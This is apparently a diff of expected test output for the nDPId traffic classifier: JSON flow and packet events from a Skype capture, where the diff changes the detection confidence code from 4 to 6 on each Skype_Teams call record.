00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1mAEAAEART6jAqAEinTg0DDLdnF8AIfBgevkCw9fuW226FZ\/i0VkBrMngLZ\/OvlepsQ=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAABAT+gAAEAREWjAqAEiQAQXjzLdnFIALKj4evsCuV\/AUAbJFwXr2TpK\/p9BHGpZ+kg1tywBGmcFc5l3l+UA"} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DD0AAEARIzfAqAEi1cezrjLdnFkAJTHjev0CDsFSgVTjU3l7SB\/6pLcIO\/MFhUO5HKYdIt4="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652388,"flow_last_seen":1431970652388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970652388,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431970652388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970652388,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw4RAAEAGlYHAqAEinTeCsMgpAbtXW5NMAAAAALAC\/\/+W4QAAAgQFtAEDAwUBAQgKPjHLqwAAAAAEAgAA"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1431970652513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652513,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7yCm78+IiV1uTTaASOJDDlAAAAgQFrAQCCApOqL71PjHLqwEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1431970652513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970652513,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+sxAAEAGXkXAqAEinTeCsMgpAbtXW5NNu\/PiI4AQECwaQwAAAQEICj4xzCdOqL71"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyWSMAAEARpePAqAEib91KDTLdnEkAHvqKev8C0IwzOBgB3UEKOkJTX5CI9Vwhwg=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1DNUAAEAR8g3AqAEib91KLjLdnFsAIUKoewECUhceSedyogxjoY07gc663Yk4liOtLw=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6I1wAAEARDKfAqAEinTfrrjLdnFMAJnmaewMCB1Y35rB9hiYgpWTMLw7QXUk3fDnH35+GDlnt"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8IkgAAEARdlHAqAEiQTffFjLdnEkAKNsyewUCeMezn62nslRHzPMr8rZBDWA5jghU5oMMawkbl98="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2CdUAAEAR8anAqAEib91NkTLdnFgAIo9yewcCvaqOUinZ3k4PRY4yBX99xmfLU0z2qZs="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA54bUAAEARt2bAqAEinTeCljLdnEcAJaaFewkCIUNJcqobuUolNpafXbellV+EM\/ULmpysjyw="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAABBP+oAAEARp7DAqAEinTg0DzLdnFsALYwJewsCVNeDMJHHK\/Dt9HVlBuPPBbINu9bDjb8MSpCCrsrjyd0TEg=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mUYAAEARls7AqAEinTfrojLdnGEAICOXew0CZW2\/4VtO8SUcLK6ApfNDe+uaEMsE"} 